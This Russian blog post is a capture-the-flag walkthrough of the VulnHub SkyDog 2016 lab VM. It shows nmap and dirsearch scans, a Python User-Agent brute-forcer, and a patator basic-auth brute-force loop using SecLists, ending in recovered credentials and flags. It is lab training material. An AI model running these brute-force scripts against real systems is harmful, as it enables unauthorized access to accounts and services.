{"id":282795,"date":"2016-12-20T23:15:04","date_gmt":"2016-12-20T20:15:04","guid":{"rendered":"http:\/\/savepearlharbor.com\/?p=282795"},"modified":"-0001-11-30T00:00:00","modified_gmt":"-0001-11-29T21:00:00","slug":"","status":"publish","type":"post","link":"https:\/\/savepearlharbor.com\/?p=282795","title":{"rendered":"VulnHub \u0420\u0430\u0437\u0431\u043e\u0440 \u0437\u0430\u0434\u0430\u043d\u0438\u0439 \u0441 CTF SkyDog: 2016 \u2014 Catch Me If You Can"},"content":{"rendered":"


\u041f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u043c \u0440\u0430\u0437\u0431\u043e\u0440 \u043b\u0430\u0431 \u0441 VulnHub<\/a>. \u041d\u0430 \u044d\u0442\u043e\u0442 \u0440\u0430\u0437 \u0431\u0443\u0434\u0435\u043c \u0440\u0430\u0437\u0431\u0438\u0440\u0430\u0442\u044c \u0440\u0435\u0448\u0435\u043d\u0438\u0435 CTF<\/a> \u0441 \u043d\u0435\u0434\u0430\u0432\u043d\u0435\u0439 \u043a\u043e\u043d\u0444\u0435\u0440\u0435\u043d\u0446\u0438\u0438 \u043f\u043e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 SkyDog Con<\/a>
<\/a> <\/p>\n

\u041d\u0430\u0447\u043d\u0451\u043c<\/h3>\n

\u0421\u043a\u0430\u0447\u0438\u0432\u0430\u0435\u043c \u043e\u0431\u0440\u0430\u0437 \u0434\u043b\u044f VirtualBox, \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u043c \u0438 \u043a\u0430\u043a \u043e\u0431\u044b\u0447\u043d\u043e \u0441\u043c\u043e\u0442\u0440\u0438\u043c \u0432\u044b\u0432\u043e\u0434 nmap`\u0430: <\/p>\n

sudo nmap 192.168.1.174 -sV -sC -p1-65535<\/code><\/pre>\n
  <\/p>\n
\u0421\u043a\u0440\u044b\u0442\u044b\u0439 \u0442\u0435\u043a\u0441\u0442<\/b><\/p>\n
\n
Starting Nmap 7.01 ( nmap.org<\/a> ) at 2016-12-18 19:39 MSK
  Nmap scan report for 192.168.1.174
  Host is up (0.00032s latency).
  PORT STATE SERVICE VERSION
  22\/tcp closed ssh
  80\/tcp open http Apache httpd 2.4.18 ((Ubuntu))
  |_http-server-header: Apache\/2.4.18 (Ubuntu)
  |_http-title: SkyDog Con CTF 2016 \u2014 Catch Me If You Can
  443\/tcp open ssl\/http Apache httpd 2.4.18 ((Ubuntu))
  |_http-server-header: Apache\/2.4.18 (Ubuntu)
  |_http-title: 400 Bad Request
  | ssl-cert: Subject: commonName=Network Solutions EV Server CA 2\/organizationName=Network Solutions L.L.C.\/stateOrProvinceName=VA\/countryName=US
  | Not valid before: 2016-09-21T14:51:57
  |_Not valid after: 2017-09-21T14:51:57
  |_ssl-date: TLS randomness does not represent time
  22222\/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
  | ssh-hostkey: 
  | 2048 b6:64:7c:d1:55:46:4e:50:e3:ba:cf:4c:1e:81:f9:db (RSA)
  |_ 256 ef:17:df:cc:db:2e:c5:24:e3:9e:25:16:3d:25:68:35 (ECDSA)
  MAC Address: 08:00:27:D3:70:74 (Oracle VirtualBox virtual NIC)
  Device type: general purpose
  Running: Linux 3.X|4.X
  OS CPE: cpe:\/o:linux:linux_kernel:3 cpe:\/o:linux:linux_kernel:4
  OS details: Linux 3.10 \u2014 4.1
  Network Distance: 1 hop
  Service Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/p><\/blockquote>\n<\/div>\n<\/div>\n
  \u041d\u0430\u043c \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b 3 \u043f\u043e\u0440\u0442\u0430 SSH(22222), HTTP(80), HTTPS(443).<\/p>\n
Flag#1 \u2014 \u00abDon\u2019t go Home Frank! There\u2019s a Hex on Your House\u00bb<\/h3>\n
  \u0421\u0443\u0434\u044f \u0438\u0437 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u044f \u043a \u043f\u0435\u0440\u0432\u043e\u043c\u0443 \u0444\u043b\u0430\u0433\u0443, \u043d\u0430\u043c \u043d\u0443\u0436\u043d\u043e \u0438\u0441\u043a\u0430\u0442\u044c \u0447\u0442\u043e-\u043b\u0438\u0431\u043e \u043f\u043e\u0445\u043e\u0436\u0435\u0435 \u043d\u0430 HEX \u043f\u043e\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u044c. 
  \u0411\u0435\u0433\u043b\u044b\u0439 \u043e\u0441\u043c\u043e\u0442\u0440 \u0441\u0430\u0439\u0442\u0430 \u043d\u0435 \u0434\u0430\u043b \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0430, \u0441\u043a\u0430\u043d \u0444\u0430\u0439\u043b\u043e\u0432 \u0438 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0439 \u0442\u043e\u0436\u0435 \u043e\u0441\u043e\u0431\u043e \u0441\u0438\u0442\u0443\u0430\u0446\u0438\u044e \u043d\u0435 \u043f\u0440\u043e\u044f\u0441\u043d\u0438\u043b:  <\/p>\n
sudo dirsearch -u http:\/\/192.168.1.174 -e php,txt,json,bak,html -w \/usr\/share\/dirb\/wordlists\/big.txt -r -f<\/code><\/pre>\n
  <\/p>\n
  \u0417\u0430\u0433\u043b\u044f\u043d\u0443\u0432 \u0432 \u043a\u043e\u0434 \u0433\u043b\u0430\u0432\u043d\u043e\u0439 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u044b \u0432\u0438\u0434\u0438\u043c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0435:  <\/p>\n
<\/div> <!--[if IE 8]> <html lang="en" class="ie8"> <![endif]--> <!--[if IE 9]> <html lang="en" class="ie9"> <![endif]--> <!--[If IE4]><script src="\/oldIE\/html5.js"><\/script><![Make sure to remove this before going to PROD]--> <!--[if !IE]><!-->         <!-- Header --><\/code><\/pre>\n
  \u0425\u043c, \u0441\u0442\u0440\u0430\u043d\u043d\u043e, \u0437\u0430\u0447\u0435\u043c \u043d\u0443\u0436\u043d\u043e \u0443\u0434\u0430\u043b\u0438\u0442\u044c \u044d\u0442\u043e\u0442 \u043a\u043e\u0434 \u043f\u0435\u0440\u0435\u0434 \u043f\u0443\u0431\u043b\u0438\u043a\u0430\u0446\u0438\u0435\u0439. \u0417\u0430\u0433\u043b\u044f\u043d\u0443 \u0432\u043d\u0443\u0442\u0440\u044c \/oldIE\/html5.js<\/i>, \u043d\u0430\u0445\u043e\u0434\u0438\u043c \u0442\u0443 \u0441\u0430\u043c\u0443\u044e HEX \u043f\u043e\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u044c \u043e \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0433\u043e\u0432\u043e\u0440\u0438\u043b\u043e\u0441\u044c \u0432 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0438 \u0444\u043b\u0430\u0433\u0430:
  <\/p>\n
  \u0414\u0435\u043a\u043e\u0434\u0438\u0440\u0443\u0435\u043c, \u0438 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u043f\u0435\u0440\u0432\u044b\u0439 \u0444\u043b\u0430\u0433: flag{7c0132070a0ef71d542663e9dc1f5dee}<\/i>. \u042d\u0442\u043e md5 \u043e\u0442 nmap<\/i>.<\/p>\n
Flag#2 \u2014 \u00abObscurity or Security? That is the Question\u00bb<\/h3>\n
  Dirsearch \u0432\u044b\u0434\u0430\u043b \u043d\u0430\u043c 403 \u043d\u0430 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0435 \/personnel<\/i>. \u041f\u0440\u043e\u0431\u0443\u0435\u043c \u0435\u0451 \u043e\u0442\u043a\u0440\u044b\u0442\u044c, \u0434\u0430\u0431\u044b \u0443\u0437\u043d\u0430\u0442\u044c \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0438, \u0432 \u043e\u0442\u0432\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0435\u0434\u0438\u043d\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0435 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0435:  <\/p>\n
ACCESS DENIED!!! You Do Not Appear To Be Coming From An FBI Workstation. Preparing Interrogation Room 1. Car Batteries Charging….<\/p><\/blockquote>\n
  \u041f\u043e\u043f\u0440\u043e\u0431\u043e\u0432\u0430\u0432 \u0438\u0437\u043c\u0435\u043d\u0438\u0442\u044c User-Agent<\/i> \u0432 \u0437\u0430\u043f\u0440\u043e\u0441\u0435, \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0442\u043e\u0442 \u0436\u0435 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442.
  Nikto \u0442\u0443\u0442 \u043d\u0430\u043c \u0442\u043e\u0436\u0435 \u043d\u0435 \u043f\u043e\u043c\u043e\u0433, \u043a\u0430\u043a \u0438 \u043d\u0430\u0434\u0435\u0436\u0434\u0430 \u043d\u0430 \u0442\u043e, \u0447\u0442\u043e \u043d\u0430 https \u043a\u0440\u0443\u0442\u0438\u0442\u0441\u044f \u0434\u0440\u0443\u0433\u0430\u044f \u0432\u0435\u0440\u0441\u0438\u044f \u0441\u0430\u0439\u0442\u0430.
  \u041f\u0440\u0435\u0434\u043f\u043e\u043b\u043e\u0436\u0438\u0432, \u0447\u0442\u043e \u0432 \u0444\u043b\u0430\u0433\u0435 1 \u0431\u044b\u043b\u0430 \u043f\u043e\u0434\u0441\u043a\u0430\u0437\u043a\u0430, \u0438 \u0441\u043d\u043e\u0432\u0430 \u0432\u0437\u0433\u043b\u044f\u043d\u0443\u0432 \u043d\u0430 \u043b\u043e\u0433, \u0432\u0441\u043f\u043e\u043c\u0438\u043d\u0430\u0435\u043c \u043f\u0440\u043e \u043d\u0435\u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u044b\u0439 ssh \u043f\u043e\u0440\u0442.
  \u041a\u043e\u043d\u043d\u0435\u043a\u0442\u0438\u043c\u0441\u044f \u0442\u0443\u0434\u0430 \u043e\u0442 root:  <\/p>\n
ssh root@192.168.1.174 -p 22222<\/code><\/pre>\n
  <\/p>\n
  \u041d\u0430\u0445\u043e\u0434\u0438\u043c \u0432\u0442\u043e\u0440\u043e\u0439 \u0444\u043b\u0430\u0433: Flag{53c82eba31f6d416f331de9162ebe997}<\/i>, \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u043c \u0445\u0435\u0448 \u043e\u0442 encrypt<\/i><\/p>\n
Flag#3 \u2014 \u00abDuring his Travels Frank has Been Known to Intercept Traffic\u00bb<\/h3>\n
  \u0418 \u0442\u0430\u043a, \u0440\u0435\u0447\u044c \u0438\u0434\u0451\u0442 \u043e \u043f\u0435\u0440\u0435\u0445\u0432\u0430\u0442\u0435 \u0442\u0440\u0430\u0444\u0438\u043a\u0430, \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0438\u0439 \u0444\u043b\u0430\u0433, \u043e\u0442\u0441\u044b\u043b\u0430\u0435\u0442 \u043d\u0430\u0441 \u043a \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044e. \u041d\u0435 \u0442\u0440\u0443\u0434\u043d\u043e \u0434\u043e\u0433\u0430\u0434\u0430\u0442\u044c\u0441\u044f, \u0447\u0442\u043e \u043d\u0443\u0436\u043d\u043e \u0437\u0430\u0433\u043b\u044f\u043d\u0443\u0442\u044c \u0432 \u0434\u0430\u043c\u043f SSL \u0442\u0440\u0430\u0444\u0438\u043a\u0430, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0438\u0434\u0451\u0442 \u043f\u0440\u0438 \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0435 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u044b.
  \u0417\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u043c Wireshark, \u0432\u044b\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u043c \u0444\u0438\u043b\u044c\u0442\u0440 \u0434\u043b\u044f \u043e\u0442\u043e\u0431\u0440\u0430\u0436\u0435\u043d\u0438\u044f \u043f\u0430\u043a\u0435\u0442\u043e\u0432 \u0442\u043e\u043b\u044c\u043a\u043e \u0441 \u0441\u0430\u0439\u0442\u0430:  <\/p>\n
ip.addr == 192.168.1.174<\/p><\/blockquote>\n
  \u041f\u0435\u0440\u0435\u0445\u043e\u0434\u0438\u043c \u043d\u0430 192.168.1.174<\/a><\/i>, \u043a\u043b\u0438\u043a\u0430\u0435\u043c \u043f\u043e \u0441\u0441\u044b\u043b\u043a\u0430\u043c, \u0447\u0442\u043e \u043d\u0430\u043c \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b, \u0438 \u0434\u0430\u043b\u0435\u0435 \u043f\u0435\u0440\u0435\u0445\u043e\u0434\u0438\u043c \u043a \u043f\u0440\u043e\u0441\u043c\u043e\u0442\u0440\u0443 \u0442\u0440\u0430\u0444\u0438\u043a\u0430:
   <\/p>\n
  \u0424\u043b\u0430\u0433 \u043d\u0430\u0439\u0434\u0435\u043d: flag3{f82366a9ddc064585d54e3f78bde3221}<\/i>, \u044d\u0442\u043e \u043e\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0445\u0435\u0448 \u043e\u0442 personnel<\/i><\/p>\n
  P.S. \u041a\u0430\u043a \u0432\u044b\u044f\u0441\u043d\u0438\u043b\u043e\u0441\u044c \u043f\u043e\u0437\u0436\u0435, \u0444\u043b\u0430\u0433 \u043c\u043e\u0436\u043d\u043e \u0431\u044b\u043b\u043e \u043d\u0430\u0439\u0442\u0438 \u043f\u0440\u043e\u0441\u0442\u043e \u0437\u0430\u0433\u043b\u044f\u043d\u0443\u0432 \u0432 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0435 \u0432 \u0441\u0432\u043e\u0439\u0441\u0442\u0432\u0430 https \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u0430:  <\/p>\n
\u0421\u043a\u0440\u044b\u0442\u044b\u0439 \u0442\u0435\u043a\u0441\u0442<\/b><\/p>\n
  <\/div>\n<\/div>\n
Flag#4 \u2014 \u00abA Good Agent is Hard to Find\u00bb<\/h3>\n
  \u0418\u0437 \u0442\u0440\u0435\u0442\u044c\u0435\u0433\u043e \u0444\u043b\u0430\u0433\u0430 \u0438 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u044f, \u0441\u043b\u0435\u0434\u0443\u0435\u0442 \u0447\u0442\u043e \u043c\u043e\u0451 \u0438\u0437\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e\u0435 \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u043e\u0436\u0435\u043d\u0438\u0435 \u043e \u0442\u043e\u043c, \u0447\u0442\u043e \u0434\u043b\u044f \u0432\u0445\u043e\u0434\u0430 \u043d\u0430 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0443 \/personnel<\/i> \u0442\u0440\u0435\u0431\u0443\u0435\u0442\u0441\u044f \u0432\u0435\u0440\u043d\u044b\u0439 User-Agent, \u043e\u043a\u0430\u0437\u0430\u043b\u043e\u0441\u044c \u0432\u0435\u0440\u043d\u044b\u043c. 
  \u0421\u043a\u0430\u0447\u0438\u0432\u0430\u0435\u043c \u0441\u043f\u0438\u0441\u043e\u043a<\/a> \u0432\u0441\u0435\u0445 User-Agent`\u043e\u0432. \u0414\u0430\u043b\u0435\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439 \u0441\u043a\u0440\u0438\u043f\u0442 \u043d\u0430 Python \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u043c \u043f\u0435\u0440\u0435\u0431\u043e\u0440.  <\/p>\n
import requests import sys  url = 'http:\/\/192.168.1.174\/personnel' ua_file = sys.argv[1] head = {'User-Agent':''} bad_resp = 'ACCESS DENIED!!! You Do Not Appear To Be Coming From An FBI Workstation. Preparing Interrogation Room 1. Car Batteries Charging....'  file = open(ua_file, 'r').read().splitlines() for item in file:         head['User-Agent'] = item.strip()         req = requests.get(url, headers=head)         if req.text != bad_resp:                 print('Found UA: %s' %(item))                 print(req.text)<\/code><\/pre>\n
  \u0420\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442 \u043d\u0435 \u0437\u0430\u0441\u0442\u0430\u0432\u0438\u043b \u0441\u0435\u0431\u044f \u0434\u043e\u043b\u0433\u043e \u0436\u0434\u0430\u0442\u044c:  <\/p>\n
\u0421\u043f\u0438\u0441\u043e\u043a \u043d\u0430\u0439\u0434\u0435\u043d\u044b\u0445 User-Agent \u0441\u0442\u0440\u043e\u043a<\/b><\/p>\n
\n
Found UA: Mozilla\/4.0 (compatible; MSIE 4.01; AOL 4.0; Windows 98)
  Found UA: Mozilla\/4.0 (compatible; MSIE 4.01; AOL 4.0; Windows 95)
  Found UA: Mozilla\/4.0 (compatible; MSIE 4.01; AOL 4.0; Mac_68K)
  Found UA: Mozilla\/4.0 PPC (compatible; MSIE 4.01; Windows CE; PPC; 240×320; Sprint:PPC-6700; PPC; 240×320)
  Found UA: Mozilla\/4.0 (compatible; MSIE 4.01; Windows NT)
  Found UA: Mozilla\/4.0 (compatible; MSIE 4.01; Windows NT 5.0)
  Found UA: Mozilla\/4.0 (compatible; MSIE 4.01; Windows CE; Sprint;PPC-i830; PPC; 240×320)
  Found UA: Mozilla\/4.0 (compatible; MSIE 4.01; Windows CE; Sprint; SCH-i830; PPC; 240×320)
  Found UA: Mozilla\/4.0 (compatible; MSIE 4.01; Windows CE; Sprint:SPH-ip830w; PPC; 240×320)
  Found UA: Mozilla\/4.0 (compatible; MSIE 4.01; Windows CE; Sprint:SPH-ip320; Smartphone; 176×220)
  Found UA: Mozilla\/4.0 (compatible; MSIE 4.01; Windows CE; Sprint:SCH-i830; PPC; 240×320)
  Found UA: Mozilla\/4.0 (compatible; MSIE 4.01; Windows CE; Sprint:SCH-i320; Smartphone; 176×220)
  Found UA: Mozilla\/4.0 (compatible; MSIE 4.01; Windows CE; Sprint:PPC-i830; PPC; 240×320)
  Found UA: Mozilla\/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone; 176×220)
  Found UA: Mozilla\/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240×320; Sprint:PPC-6700; PPC; 240×320)
  Found UA: Mozilla\/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240×320; PPC)
  Found UA: Mozilla\/4.0 (compatible; MSIE 4.01; Windows CE; PPC)
  Found UA: Mozilla\/4.0 (compatible; MSIE 4.01; Windows CE)
  Found UA: Mozilla\/4.0 (compatible; MSIE 4.01; Windows 98; Hotbar 3.0)
  Found UA: Mozilla\/4.0 (compatible; MSIE 4.01; Windows 98; DigExt)
  Found UA: Mozilla\/4.0 (compatible; MSIE 4.01; Windows 98)
  Found UA: Mozilla\/4.0 (compatible; MSIE 4.01; Windows 95)
  Found UA: Mozilla\/4.0 (compatible; MSIE 4.01; Mac_PowerPC)
  Found UA: Mozilla\/4.0 WebTV\/2.6 (compatible; MSIE 4.0)
  Found UA: Mozilla\/4.0 (compatible; MSIE 4.0; Windows NT)
  Found UA: Mozilla\/4.0 (compatible; MSIE 4.0; Windows 98 )
  Found UA: Mozilla\/4.0 (compatible; MSIE 4.0; Windows 95; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
  Found UA: Mozilla\/4.0 (compatible; MSIE 4.0; Windows 95)
  Found UA: Mozilla\/4.0 (Compatible; MSIE 4.0)
  Found UA: Mozilla\/2.0 (compatible; MSIE 4.0; Windows 98)
  Found UA: nuSearch Spider (compatible; MSIE 4.01; Windows NT)<\/p><\/blockquote>\n
  <\/div>\n<\/div>\n
  \u0421\u0443\u0434\u044f \u043f\u043e \u0432\u0441\u0435\u043c\u0443 \u0424\u0411\u0420 \u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0442\u043e\u043b\u044c\u043a\u043e MSIE 4.0 \ud83d\ude42
  \u041f\u043e\u0441\u043b\u0435 \u0437\u0430\u043c\u0435\u043d\u044b \u0432 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0435 User-Agent \u0438 \u043f\u0435\u0440\u0435\u0445\u043e\u0434\u0430 \u043f\u043e \u0441\u0441\u044b\u043b\u043a\u0435, \u043f\u043e\u043f\u0430\u0434\u0430\u0435\u043c \u043d\u0430 FBI Portal \u0430\u0433\u0435\u043d\u0442\u0430 Hanratty, \u0438 \u0432 \u0441\u0430\u043c\u043e\u043c \u043d\u0438\u0437\u0443 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u044b \u0432\u0438\u0434\u0438\u043c \u043e\u0447\u0435\u0440\u0435\u0434\u043d\u043e\u0439 \u0444\u043b\u0430\u0433:
  
  md5online<\/a> \u043b\u044e\u0431\u0435\u0437\u043d\u043e \u0441\u043e\u043e\u0431\u0449\u0438\u043b \u0447\u0442\u043e \u044d\u0442\u043e \u0445\u0435\u0448 \u043e\u0442 evidence<\/i>.<\/p>\n
Flag#5 \u2014 \u00abThe Devil is in the Details \u2014 Or is it Dialogue? Either Way, if it\u2019s Simple, Guessable, or Personal it Goes Against Best Practices\u00bb<\/h3>\n
  \u0420\u044f\u0434\u043e\u043c \u0441 \u0444\u043b\u0430\u0433\u043e\u043c, \u043c\u043e\u0436\u0435\u043c \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u0442\u044c \u0435\u0449\u0451 \u043e\u0434\u043d\u0443 \u043f\u043e\u0434\u0441\u043a\u0430\u0437\u043a\u0443 \u044d\u0442\u043e newevidence<\/i>. \u0410 \u0438\u0437 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u044f \u0444\u043b\u0430\u0433\u0430 \u0441\u043b\u0435\u0434\u0443\u0435\u0442, \u0447\u0442\u043e \u043d\u0443\u0436\u043d\u043e \u0438\u0441\u043a\u0430\u0442\u044c \u0434\u0435\u0442\u0430\u043b\u0438.
  \u0412 \u0433\u043b\u0430\u0437\u0430 \u0441\u0440\u0430\u0437\u0443 \u0431\u0440\u043e\u0441\u0430\u0435\u0442\u0441\u044f \u0440\u0430\u0437\u043d\u0438\u0446\u0430 \u043c\u0435\u0436\u0434\u0443 \u043d\u0435 \u043e\u0442\u0441\u043e\u0440\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u0438 \u043e\u0442\u0441\u043e\u0440\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u0441\u043f\u0438\u0441\u043a\u0430\u043c\u0438, \u0430 \u0442\u0430\u043a \u0436\u0435 \u0435\u0449\u0451 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0434\u0435\u0442\u0430\u043b\u0435\u0439, \u0441\u043e\u0431\u0440\u0430\u0432 \u0432\u0441\u0451 \u0432 \u043a\u0443\u0447\u0443 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439 \u0441\u043f\u0438\u0441\u043e\u043a:  <\/p>\n
Manhattan
  Heidelbery
  Great American Masterpiece
  Miami
  July 16, 2009
  617468
  inconsequential
  newevidence
  Hanratty<\/p><\/blockquote>\n
  \u041f\u043e\u0441\u043b\u0435 \u0434\u043e\u043b\u0433\u0438\u0445 \u043f\u043e\u0438\u0441\u043a\u043e\u0432 \u043f\u043e \u044d\u0442\u0438\u043c \u043a\u043b\u044e\u0447\u0435\u0432\u044b\u043c \u0441\u043b\u043e\u0432\u0430\u043c, \u043c\u043e\u0436\u043d\u043e \u043d\u0430\u0442\u043a\u043d\u0443\u0442\u044c\u0441\u044f \u043d\u0430 \u0441\u0441\u044b\u043b\u043a\u0443<\/a>. \u041f\u043e\u043b\u0438\u0441\u0442\u0430\u0432 \u0435\u0451 \u043d\u0430\u0445\u043e\u0434\u0438\u043c:  <\/p>\n
Agent Carl Hanratty \u2014 \u0433\u0435\u0440\u043e\u0439 \u043f\u0440\u043e\u0438\u0437\u0432\u0435\u0434\u0435\u043d\u0438\u044f
  Catch Me If You Can \u2014 \u043a\u043d\u0438\u0433\u0430
  Miami \u2014 \u0441\u0446\u0435\u043d\u0430 17 \u0444\u0438\u043b\u044c\u043c\u0430
  Heidelberg \u2014 \u043f\u0435\u0447\u0430\u0442\u043d\u0430\u044f \u043c\u0430\u0448\u0438\u043d\u0430 \u0438\u0437 \u0444\u0438\u043b\u044c\u043c\u0430<\/p><\/blockquote>\n
  \u041f\u0440\u043e\u0434\u043e\u043b\u0436\u0438\u043c, \u0437\u0430\u0431\u0438\u0432 \u044d\u0442\u043e\u0442 \u0441\u043f\u0438\u0441\u043e\u043a \u0432 \u0444\u0430\u0439\u043b, \u0438 \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u0432 \u043f\u0435\u0440\u0435\u0431\u043e\u0440 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0439 \u0438 \u0444\u0430\u0439\u043b\u043e\u0432 \u043d\u0430\u0445\u043e\u0434\u0438\u043c \u043a\u043e\u0435-\u0447\u0442\u043e \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e\u0435:
  <\/p>\n
  \u041e\u0442\u043b\u0438\u0447\u043d\u043e \u043c\u044b \u043d\u0430\u0448\u043b\u0438 \u0444\u043e\u0440\u043c\u0443 \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u0438!
  \u0423 \u043d\u0430\u0441 \u0435\u0441\u0442\u044c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c: Carl Hanratty<\/i>, \u0438\u0437 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u044f \u0444\u043b\u0430\u0433\u0430 \u043c\u043e\u0436\u043d\u043e \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u043e\u0436\u0438\u0442\u044c, \u0447\u0442\u043e \u043f\u0430\u0440\u043e\u043b\u044c, \u044d\u0442\u043e \u0447\u0442\u043e-\u0442\u043e \u043f\u0440\u043e\u0441\u0442\u043e\u0435 \u2014 \u043b\u0438\u0447\u043d\u0430\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f.
  \u041f\u0440\u0438\u0441\u0442\u0443\u043f\u0438\u043c \u043a \u043f\u0435\u0440\u0435\u0431\u043e\u0440\u0443. \u0421\u0433\u0435\u043d\u0435\u0440\u0438\u0432 \u0441\u043b\u043e\u0432\u0430\u0440\u044c \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u044b\u0445 \u043b\u043e\u0433\u0438\u043d\u043e\u0432 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u043c patator<\/a>, \u0441\u043a\u0430\u0440\u043c\u043b\u0438\u0432\u0430\u0435\u043c \u0435\u043c\u0443 \u043d\u0430\u0431\u043e\u0440 \u0441\u043b\u043e\u0432\u0430\u0440\u0435\u0439 SecLists<\/a>  <\/p>\n
for item in $(find SecLists\/ -name "*\\.txt"); do sudo patator http_fuzz url=http:\/\/192.168.1.174\/newevidence auth_type=basic accept_cookie=1 follow=1 -x ignore:code=401 header='User-Agent: Mozilla\/4.0 (compatible; MSIE 4.01; Windows NT 5.0)' user_pass="FILE0:FILE1" 0=logins.txt 1=$item; done<\/code><\/pre>\n
  \u0418 \u0441\u043f\u0443\u0441\u0442\u044f \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u0432\u0440\u0435\u043c\u044f \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0438\u0441\u0445\u043e\u0434\u043d\u0443\u044e \u043a\u043e\u043c\u0431\u0438\u043d\u0430\u0446\u0438\u044e:  <\/p>\n
INFO \u2014 200 1462:676 0.011 | carl.hanratty:Grace | 37586 | HTTP\/1.1 200 OK<\/p><\/blockquote>\n
  P.S. \u0414\u0435\u0442\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0438\u0437\u0443\u0447\u0438\u0432 \u0444\u0438\u043b\u044c\u043c \u0438\u043b\u0438 \u043a\u043d\u0438\u0433\u0443, \u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u0441\u044f \u043f\u043e\u043d\u044f\u0442\u043d\u043e, \u0447\u0442\u043e \u0413\u0440\u0435\u0439\u0441 \u044d\u0442\u043e \u0434\u043e\u0447\u044c \u041a\u0430\u0440\u043b\u0430.<\/p>\n
  \u041f\u043e\u0441\u043b\u0435 \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u0438 \u043f\u043e\u043f\u0430\u0434\u0430\u0435\u043c \u043d\u0430 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0443:
  <\/p>\n
  \u0418 \u043f\u0435\u0440\u0435\u0439\u0434\u044f \u043f\u043e \u043e\u0434\u043d\u043e\u0439 \u0438\u0437 \u0441\u0441\u044b\u043b\u043e\u043a \u043d\u0430\u0445\u043e\u0434\u0438\u043c \u0444\u043b\u0430\u0433: flag{117c240d49f54096413dd64280399ea9}
